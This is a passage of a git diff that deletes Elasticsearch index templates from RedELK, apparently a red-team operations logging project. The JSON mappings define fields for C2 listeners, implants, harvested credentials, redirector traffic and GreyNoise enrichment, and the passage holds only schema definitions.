"container.labels": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "container.labels.*" - } - }, - { - "dns.answers": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "dns.answers.*" - } - }, - { - "log.syslog": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "log.syslog.*" - } - }, - { - "network.inner": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "network.inner.*" - } - }, - { - "observer.egress": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "observer.egress.*" - } - }, - { - "observer.ingress": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "observer.ingress.*" - } - }, - { - "fields": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "fields.*" - } - }, - { - "docker.container.labels": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "docker.container.labels.*" - } - }, - { - "kubernetes.labels.*": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "*", - "path_match": "kubernetes.labels.*" - } - }, - { - "kubernetes.annotations.*": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "*", - "path_match": "kubernetes.annotations.*" - } - }, - { - "docker.attrs": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "docker.attrs.*" - } - }, - { - "azure.activitylogs.identity.claims.*": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "*", - "path_match": "azure.activitylogs.identity.claims.*" - } - }, - { - "kibana.log.meta": { - "mapping": { - "type": "keyword" - }, - "match_mapping_type": "string", - "path_match": "kibana.log.meta.*" - } - }, - { - "strings_as_keyword": { - "mapping": { - "ignore_above": 1024, - "type": "keyword" - }, - "match_mapping_type": "string" - } - } - ], - "numeric_detection": false, - "properties": { - "@timestamp": { - "type": "date" - }, - "agent": { - "properties": { - "ephemeral_id": { - "ignore_above": 1024, - "type": "keyword" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "c2": { - "properties": { - "log": { - "properties": { - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "message": { - "type": "keyword" - }, - "program": { - "type": "keyword" - }, - "timestamp": { - "type": "text" - } - }, - "type": "object" - }, - "creds": { - "properties": { - "credential": { - "type": "keyword" - }, - "host": { - "type": "keyword" - }, - "realm": { - "type": "keyword" - }, - "source": { - "type": "keyword" - }, - "username": { - "type": "keyword" - } - }, - "type": "object" - }, - "ecs": { - "properties": { - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "error": { - "properties": { - "code": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "message": { - "norms": false, - "type": "text" - }, - "stack_trace": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "event": { - "properties": { - "action": { - "ignore_above": 1024, - "type": "keyword" - }, - "category": { - "ignore_above": 1024, - "type": "keyword" - }, - "code": { - "ignore_above": 1024, - "type": "keyword" - }, - "created": { - "type": "date" - }, - "dataset": { - "ignore_above": 1024, - "type": "keyword" - }, - "duration": { - "type": "long" - }, - "end": { - "type": "date" - }, - "hash": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ingested": { - "type": "date" - }, - "kind": { - "ignore_above": 1024, - "type": "keyword" - }, - "module": { - "ignore_above": 1024, - "type": "keyword" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "outcome": { - "ignore_above": 1024, - "type": "keyword" - }, - "provider": { - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - }, - "risk_score": { - "type": "float" - }, - "risk_score_norm": { - "type": "float" - }, - "sequence": { - "type": "long" - }, - "severity": { - "type": "long" - }, - "start": { - "type": "date" - }, - "timezone": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "url": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "file": { - "properties": { - "directory": { - "ignore_above": 1024, - "type": "keyword" - }, - "directory_local": { - "type": "keyword" - }, - "hash": { - "properties": { - "md5": { - "ignore_above": 1024, - "type": "keyword" - }, - "sha1": { - "ignore_above": 1024, - "type": "keyword" - }, - "sha256": { - "ignore_above": 1024, - "type": "keyword" - }, - "sha512": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "path": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "path_local": { - "fields": { - "text": { - "type": "text" - } - }, - "type": "keyword" - }, - "size": { - "type": "long" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "url": { - "type": "keyword" - } - }, - "type": "object" - }, - "host": { - "properties": { - "architecture": { - "ignore_above": 1024, - "type": "keyword" - }, - "domain": { - "ignore_above": 1024, - "type": "keyword" - }, - "domain_ext": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "geo": { - "properties": { - "as": { - "properties": { - "organization": { - "properties": { - "name": { - "type": "keyword" - }, - "number": { - "type": "integer" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "city_name": { - "type": "keyword" - }, - "continent_name": { - "type": "keyword" - }, - "country_iso_code": { - "type": "keyword" - }, - "country_name": { - "type": "keyword" - }, - "location": { - "type": "geo_point" - }, - "name": { - "type": "keyword" - }, - "region_iso_code": { - "type": "keyword" - }, - "region_name": { - "type": "keyword" - } - }, - "type": "object" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ip": { - "type": "ip" - }, - "ip_ext": { - "doc_values": true, - "index": true, - "store": false, - "type": "ip" - }, - "ip_int": { - "type": "ip" - }, - "mac": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "os": { - "properties": { - "build": { - "ignore_above": 1024, - "type": "keyword" - }, - "codename": { - "ignore_above": 1024, - "type": "keyword" - }, - "family": { - "ignore_above": 1024, - "type": "keyword" - }, - "full": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "kernel": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "platform": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "implant": { - "properties": { - "arch": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "checkin": { - "type": "text" - }, - "id": { - "type": "keyword" - }, - "input": { - "type": "text" - }, - "link_mode": { - "type": "keyword" - }, - "linked": { - "type": "boolean" - }, - "log_file": { - "type": "keyword" - }, - "output": { - "type": "text" - }, - "parent_id": { - "type": "keyword" - }, - "sleep": { - "type": "keyword" - }, - "task": { - "type": "keyword" - }, - "url": { - "type": "keyword" - } - }, - "type": "object" - }, - "infra": { - "properties": { - "attack_scenario": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "log_type": { - "type": "keyword" - } - }, - "type": "object" - }, - "input": { - "properties": { - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "ioc": { - "properties": { - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "log": { - "properties": { - "file": { - "properties": { - "path": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "flags": { - "ignore_above": 1024, - "type": "keyword" - }, - "level": { - "ignore_above": 1024, - "type": "keyword" - }, - "logger": { - "ignore_above": 1024, - "type": "keyword" - }, - "offset": { - "type": "long" - }, - "origin": { - "properties": { - "file": { - "properties": { - "line": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "function": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "source": { - "properties": { - "address": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "syslog": { - "properties": { - "facility": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "priority": { - "type": "long" - }, - "severity": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "message": { - "norms": false, - "type": "text" - }, - "process": { - "properties": { - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "pid": { - "type": "long" - } - }, - "type": "object" - }, - "screenshot": { - "properties": { - "full": { - "type": "keyword" - }, - "thumb": { - "type": "keyword" - } - }, - "type": "object" - }, - "service": { - "properties": { - "name": { - "type": "keyword" - }, - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "tags": { - "ignore_above": 1024, - "type": "keyword" - }, - "threat": { - "properties": { - "framework": { - "ignore_above": 1024, - "type": "keyword" - }, - "tactic": { - "properties": { - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "technique": { - "properties": { - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "user": { - "properties": { - "domain": { - "ignore_above": 1024, - "type": "keyword" - }, - "email": { - "ignore_above": 1024, - "type": "keyword" - }, - "hash": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - } - }, - "order": 1, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - } -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json deleted file mode 100644 index 8deaeef1..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_iplist.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "iplist-*" - ], - "mappings": { - "_routing": { - "required": false - }, - "_source": { - "enabled": true, - "excludes": [], - "includes": [] - }, - "date_detection": true, - "dynamic": true, - "dynamic_date_formats": [ - "strict_date_optional_time", - "yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z" - ], - "numeric_detection": false, - "properties": { - "@timestamp": { - "doc_values": true, - "ignore_malformed": false, - "index": true, - "store": false, - "type": "date" - }, - "date_modified": { - "type": "date" - }, - "ip": { - "type": "ip" - }, - "list": { - "type": "keyword" - }, - "source": { - "type": "keyword" - } - } - }, - "order": 0, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - }, - "version": 1 -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json deleted file mode 100644 index 87d01eb9..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redelk.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "redelk-*" - ], - "mappings": { - "_routing": { - "required": false - }, - "_source": { - "enabled": true, - "excludes": [], - "includes": [] - }, - "date_detection": true, - "dynamic": true, - "dynamic_date_formats": [ - "strict_date_optional_time", - "yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z" - ], - "dynamic_templates": [], - "numeric_detection": true, - "properties": { - "@timestamp": { - "type": "date" - }, - "iplist": { - "properties": { - "comments": { - "type": "text" - }, - "ip": { - "coerce": true, - "index": true, - "store": false, - "type": "ip_range" - }, - "name": { - "type": "keyword" - }, - "source": { - "type": "keyword" - } - }, - "type": "object" - }, - "module": { - "properties": { - "last_run": { - "dynamic": true, - "enabled": true, - "properties": { - "message": { - "type": "text" - }, - "status": { - "type": "keyword" - }, - "timestamp": { - "doc_values": true, - "ignore_malformed": false, - "index": true, - "store": false, - "type": "date" - } - }, - "type": "object" - }, - "name": { - "type": "keyword" - }, - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "type": { - "type": "keyword" - } - } - }, - "order": 0, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - }, - "version": 1 -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json deleted file mode 100644 index d48ab86f..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_redirtraffic.json +++ /dev/null @@ -1,759 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "redirtraffic-*" - ], - "mappings": { - "_meta": { - "beat": "rtops", - "version": "7.8.0" - }, - "_routing": { - "required": false - }, - "_source": { - "enabled": true, - "excludes": [], - "includes": [] - }, - "date_detection": false, - "dynamic": true, - "dynamic_templates": [ - { - "labels": { - "mapping": { - "type": "flattened" - }, - "path_match": "alarm.alarm_*" - } - } - ], - "numeric_detection": false, - "properties": { - "@timestamp": { - "type": "date" - }, - "agent": { - "properties": { - "ephemeral_id": { - "ignore_above": 1024, - "type": "keyword" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "alarm": { - "properties": { - "alarm_httptraffic": { - "properties": { - "last_alarmed": { - "doc_values": true, - "ignore_malformed": false, - "index": true, - "store": false, - "type": "date_nanos" - }, - "last_checked": { - "type": "date_nanos" - } - }, - "type": "object" - }, - "last_alarmed": { - "type": "date_nanos" - }, - "last_checked": { - "type": "date_nanos" - }, - "timestamp": { - "type": "date" - } - }, - "type": "object" - }, - "ecs": { - "properties": { - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "event": { - "properties": { - "action": { - "ignore_above": 1024, - "type": "keyword" - }, - "category": { - "ignore_above": 1024, - "type": "keyword" - }, - "code": { - "ignore_above": 1024, - "type": "keyword" - }, - "created": { - "type": "date" - }, - "dataset": { - "ignore_above": 1024, - "type": "keyword" - }, - "duration": { - "type": "long" - }, - "end": { - "type": "date" - }, - "hash": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ingested": { - "type": "date" - }, - "kind": { - "ignore_above": 1024, - "type": "keyword" - }, - "module": { - "ignore_above": 1024, - "type": "keyword" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "outcome": { - "ignore_above": 1024, - "type": "keyword" - }, - "provider": { - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - }, - "risk_score": { - "type": "float" - }, - "risk_score_norm": { - "type": "float" - }, - "sequence": { - "type": "long" - }, - "severity": { - "type": "long" - }, - "start": { - "type": "date" - }, - "timezone": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "url": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "greynoise": { - "properties": { - "Name_List": { - "type": "text" - }, - "OS_List": { - "type": "text" - }, - "first_seen": { - "type": "keyword" - }, - "ip": { - "type": "keyword" - }, - "last_result": { - "properties": { - "category": { - "type": "keyword" - }, - "confidence": { - "type": "keyword" - }, - "first_seen": { - "type": "keyword" - }, - "intention": { - "type": "keyword" - }, - "last_updated": { - "type": "keyword" - }, - "metadata": { - "properties": { - "asn": { - "type": "keyword" - }, - "datacenter": { - "type": "text" - }, - "link": { - "type": "text" - }, - "org": { - "type": "text" - }, - "os": { - "type": "text" - }, - "rdns": { - "type": "keyword" - }, - "rdns_parent": { - "type": "keyword" - }, - "tor": { - "type": "boolean" - } - }, - "type": "object" - }, - "name": { - "type": "keyword" - } - }, - "type": "object" - }, - "query_timestamp": { - "type": "date" - }, - "status": { - "type": "keyword" - } - }, - "type": "object" - }, - "host": { - "properties": { - "architecture": { - "ignore_above": 1024, - "type": "keyword" - }, - "domain": { - "ignore_above": 1024, - "type": "keyword" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ip": { - "type": "ip" - }, - "mac": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "os": { - "properties": { - "build": { - "ignore_above": 1024, - "type": "keyword" - }, - "codename": { - "ignore_above": 1024, - "type": "keyword" - }, - "family": { - "ignore_above": 1024, - "type": "keyword" - }, - "full": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "kernel": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "platform": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "http": { - "properties": { - "headers": { - "properties": { - "all": { - "fields": { - "text": { - "type": "text" - } - }, - "type": "keyword" - }, - "forwarded": { - "type": "keyword" - }, - "host": { - "type": "keyword" - }, - "useragent": { - "type": "keyword" - }, - "via": { - "type": "keyword" - }, - "x_forwarded_for": { - "type": "keyword" - }, - "x_forwarded_proto": { - "type": "keyword" - }, - "x_host": { - "type": "keyword" - } - }, - "type": "object" - }, - "request": { - "properties": { - "body": { - "properties": { - "bytes": { - "type": "long" - }, - "content": { - "fields": { - "text": { - "type": "text" - } - }, - "type": "keyword" - } - }, - "type": "object" - }, - "bytes": { - "type": "long" - }, - "method": { - "type": "keyword" - } - }, - "type": "object" - }, - "response": { - "properties": { - "bytes": { - "type": "long" - }, - "status_code": { - "type": "long" - } - }, - "type": "object" - }, - "version": { - "type": "keyword" - } - }, - "type": "object" - }, - "infra": { - "properties": { - "attack_scenario": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "log": { - "dynamic": true, - "enabled": true, - "properties": { - "type": { - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "input": { - "properties": { - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "log": { - "properties": { - "file": { - "properties": { - "path": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "level": { - "ignore_above": 1024, - "type": "keyword" - }, - "logger": { - "ignore_above": 1024, - "type": "keyword" - }, - "offset": { - "type": "long" - }, - "origin": { - "properties": { - "file": { - "properties": { - "line": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "function": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "source": { - "properties": { - "address": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "syslog": { - "properties": { - "facility": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "priority": { - "type": "long" - }, - "severity": { - "properties": { - "code": { - "type": "long" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "message": { - "norms": false, - "type": "text" - }, - "process": { - "properties": { - "name": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "pid": { - "type": "long" - } - }, - "type": "object" - }, - "redir": { - "properties": { - "backend": { - "properties": { - "name": { - "type": "keyword" - } - }, - "type": "object" - }, - "catchall": { - "eager_global_ordinals": false, - "fielddata": false, - "index": true, - "index_options": "positions", - "index_phrases": false, - "norms": true, - "store": false, - "type": "text" - }, - "frontend": { - "properties": { - "ip": { - "type": "ip" - }, - "name": { - "type": "keyword" - }, - "port": { - "type": "long" - } - }, - "type": "object" - }, - "program": { - "type": "keyword" - }, - "timestamp": { - "type": "text" - } - }, - "type": "object" - }, - "source": { - "properties": { - "as": { - "properties": { - "number": { - "type": "long" - }, - "organization": { - "properties": { - "name": { - "fields": { - "text": { - "type": "text" - } - }, - "type": "keyword" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "cdn": { - "dynamic": true, - "enabled": true, - "properties": { - "domain": { - "type": "keyword" - }, - "ip": { - "type": "ip" - }, - "port": { - "type": "long" - } - }, - "type": "object" - }, - "domain": { - "type": "keyword" - }, - "geo": { - "properties": { - "city_name": { - "type": "keyword" - }, - "continent_name": { - "type": "keyword" - }, - "country_iso_code": { - "type": "keyword" - }, - "country_name": { - "type": "keyword" - }, - "location": { - "type": "geo_point" - }, - "name": { - "type": "keyword" - }, - "region_iso_code": { - "type": "keyword" - }, - "region_name": { - "type": "keyword" - } - }, - "type": "object" - }, - "host_info": { - "properties": { - "build": { - "type": "keyword" - }, - "device": { - "type": "keyword" - }, - "major": { - "type": "keyword" - }, - "minor": { - "type": "keyword" - }, - "name": { - "type": "keyword" - }, - "os": { - "type": "keyword" - }, - "os_name": { - "type": "keyword" - }, - "patch": { - "type": "keyword" - } - }, - "type": "object" - }, - "ip": { - "type": "ip" - }, - "ip_otherproxies": { - "type": "keyword" - }, - "port": { - "type": "long" - } - }, - "type": "object" - }, - "tags": { - "ignore_above": 1024, - "type": "keyword" - } - } - }, - "order": 1, - "settings": { - "index": { - "mapping": { - "total_fields": { - "limit": "10000" - } - }, - "number_of_replicas": "0", - "number_of_shards": "1", - "query": { - "default_field": "*" - }, - "refresh_interval": "5s" - } - } -} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json deleted file mode 100644 index 494d0fb3..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_elasticsearch_template_rtops.json +++ /dev/null @@ -1,864 +0,0 @@ -{ - "aliases": {}, - "index_patterns": [ - "rtops-*" - ], - "mappings": { - "_meta": { - "beat": "rtops", - "version": "7.8.0" - }, - "_routing": { - "required": false - }, - "_source": { - "enabled": true, - "excludes": [], - "includes": [] - }, - "date_detection": false, - "dynamic": true, - "dynamic_templates": [ - { - "labels": { - "mapping": { - "type": "flattened" - }, - "path_match": "alarm.alarm_*" - } - } - ], - "numeric_detection": false, - "properties": { - "@timestamp": { - "type": "date" - }, - "agent": { - "properties": { - "ephemeral_id": { - "ignore_above": 1024, - "type": "keyword" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "alarm": { - "properties": { - "timestamp": { - "type": "date" - } - }, - "type": "object" - }, - "c2": { - "properties": { - "listener": { - "properties": { - "bind_port": { - "type": "long" - }, - "domains": { - "fields": { - "text": { - "type": "text" - } - }, - "type": "keyword" - }, - "host": { - "type": "keyword" - }, - "name": { - "type": "keyword" - }, - "port": { - "type": "long" - }, - "profile": { - "type": "keyword" - }, - "proxy": { - "type": "keyword" - }, - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "log": { - "properties": { - "type": { - "type": "keyword" - } - }, - "type": "object" - }, - "message": { - "type": "text" - }, - "operator": { - "doc_values": true, - "eager_global_ordinals": false, - "index": true, - "index_options": "docs", - "norms": false, - "split_queries_on_whitespace": false, - "store": false, - "type": "keyword" - }, - "operator_ip": { - "type": "ip" - }, - "program": { - "type": "keyword" - }, - "timestamp": { - "type": "text" - } - }, - "type": "object" - }, - "creds": { - "properties": { - "credential": { - "type": "keyword" - }, - "host": { - "type": "keyword" - }, - "realm": { - "type": "keyword" - }, - "source": { - "type": "keyword" - }, - "username": { - "type": "keyword" - } - }, - "type": "object" - }, - "ecs": { - "properties": { - "version": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "error": { - "properties": { - "code": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "message": { - "norms": false, - "type": "text" - }, - "stack_trace": { - "fields": { - "text": { - "norms": false, - "type": "text" - } - }, - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "event": { - "properties": { - "action": { - "ignore_above": 1024, - "type": "keyword" - }, - "category": { - "ignore_above": 1024, - "type": "keyword" - }, - "code": { - "ignore_above": 1024, - "type": "keyword" - }, - "created": { - "type": "date" - }, - "dataset": { - "ignore_above": 1024, - "type": "keyword" - }, - "duration": { - "type": "long" - }, - "end": { - "type": "date" - }, - "enriched_from": { - "type": "keyword" - }, - "hash": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ingested": { - "type": "date" - }, - "kind": { - "ignore_above": 1024, - "type": "keyword" - }, - "module": { - "ignore_above": 1024, - "type": "keyword" - }, - "original": { - "ignore_above": 1024, - "type": "keyword" - }, - "outcome": { - "ignore_above": 1024, - "type": "keyword" - }, - "provider": { - "ignore_above": 1024, - "type": "keyword" - }, - "reference": { - "ignore_above": 1024, - "type": "keyword" - }, - "risk_score": { - "type": "float" - }, - "risk_score_norm": { - "type": "float" - }, - "sequence": { - "type": "long" - }, - "severity": { - "type": "long" - }, - "start": { - "type": "date" - }, - "timezone": { - "ignore_above": 1024, - "type": "keyword" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "url": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "file": { - "properties": { - "directory": { - "ignore_above": 1024, - "type": "keyword" - }, - "directory_local": { - "type": "keyword" - }, - "hash": { - "properties": { - "md5": { - "ignore_above": 1024, - "type": "keyword" - }, - "sha1": { - "ignore_above": 1024, - "type": "keyword" - }, - "sha256": { - "ignore_above": 1024, - "type": "keyword" - }, - "sha512": { - "ignore_above": 1024, - "type": "keyword" - } - }, - "type": "object" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "path": { - "type": "text" - }, - "path_local": { - "type": "text" - }, - "size": { - "type": "long" - }, - "type": { - "ignore_above": 1024, - "type": "keyword" - }, - "url": { - "type": "keyword" - } - }, - "type": "object" - }, - "host": { - "properties": { - "architecture": { - "ignore_above": 1024, - "type": "keyword" - }, - "domain": { - "ignore_above": 1024, - "type": "keyword" - }, - "domain_ext": { - "type": "text" - }, - "ext_domain": { - "type": "keyword" - }, - "geo": { - "properties": { - "as": { - "properties": { - "organization": { - "properties": { - "name": { - "type": "keyword" - }, - "number": { - "type": "integer" - } - }, - "type": "object" - } - }, - "type": "object" - }, - "city_name": { - "type": "keyword" - }, - "continent_name": { - "type": "keyword" - }, - "country_iso_code": { - "type": "keyword" - }, - "country_name": { - "type": "keyword" - }, - "location": { - "type": "geo_point" - }, - "name": { - "type": "keyword" - }, - "region_iso_code": { - "type": "keyword" - }, - "region_name": { - "type": "keyword" - } - }, - "type": "object" - }, - "hostname": { - "ignore_above": 1024, - "type": "keyword" - }, - "id": { - "ignore_above": 1024, - "type": "keyword" - }, - "ip": { - "type": "ip" - }, - "ip_ext": { - "type": "ip" - }, - "ip_int": { - "type": "ip" - }, - "mac": { - "ignore_above": 1024, - "type": "keyword" - }, - "name": { - "ignore_above": 1024, - "type": "keyword" - }, - "os": { - "properties": { - "build": { - "ignore_above": 1024, - "type": "keyword" - }, - "codename": { - "ignore_above": 1024, - "type": "keyword" - }, - "family": { - 